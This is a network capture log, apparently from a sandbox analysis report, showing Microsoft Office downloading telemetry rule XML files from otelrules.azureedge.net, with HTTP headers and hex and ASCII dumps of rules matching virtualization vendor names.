                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      63192.168.2.74977313.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:50 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:49 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                      x-ms-request-id: 5304f1e1-001e-005a-6c6b-3bc3d0000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164149Z-185f5d8b95csd4bwhC1NYCq7dc0000000afg0000000063cc
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:50 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      64192.168.2.74977213.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:49 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:50 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:49 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                      x-ms-request-id: 5633ff77-c01e-0014-30eb-3aa6a3000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164149Z-r1d97b99577hsvhhhC1TEByb1w000000039g00000000q488
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:50 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      65192.168.2.74977513.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:51 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:51 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:51 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 485
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                      x-ms-request-id: 9ccd0155-401e-0015-24f2-3a0e8d000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164151Z-r1d97b99577hsvhhhC1TEByb1w00000003d000000000c040
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:51 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      66192.168.2.74977613.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:51 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:52 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 411
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                      x-ms-request-id: 961908b5-401e-0016-178c-3a53e0000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164152Z-r1d97b99577kk29chC1TEBemmg000000095g00000000crrs
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:52 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      67192.168.2.74977413.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:51 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:52 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                      x-ms-request-id: 8e68b2a4-701e-005c-1a8c-3abb94000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164152Z-185f5d8b95c68cvnhC1NYCfn7s0000000adg00000000u697
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:52 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      68192.168.2.74977813.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:51 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:52 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                      x-ms-request-id: 38897a0b-401e-000a-7a8c-3a4a7b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164152Z-185f5d8b95c4hl5whC1NYCeex00000000a90000000013t8v
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:52 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      69192.168.2.74977713.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:51 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:52 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:52 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 470
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                      x-ms-request-id: af4852c5-601e-000d-3a8c-3a2618000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164152Z-1777c6cb754mqztshC1TEB4mkc00000009u000000000ss2e
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:52 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      70192.168.2.74977913.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:53 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:53 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 502
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582BB6A0D312"
                                                                                                                                                                                                                      x-ms-request-id: 5c70d6ce-001e-00ad-368c-3a554b000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164153Z-185f5d8b95c4vwv8hC1NYCy4v40000000ag0000000012d7e
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                      71192.168.2.74978013.107.246.63443
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 16:41:54 GMT
                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                      ETag: "0x8DC582B9D30478D"
                                                                                                                                                                                                                      x-ms-request-id: 733c43f5-901e-007b-0e8c-3aac50000000
                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                      x-azure-ref: 20241120T164154Z-1777c6cb7549j9hhhC1TEBzmcc00000009t000000000crhu
                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      2024-11-20 16:41:54 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
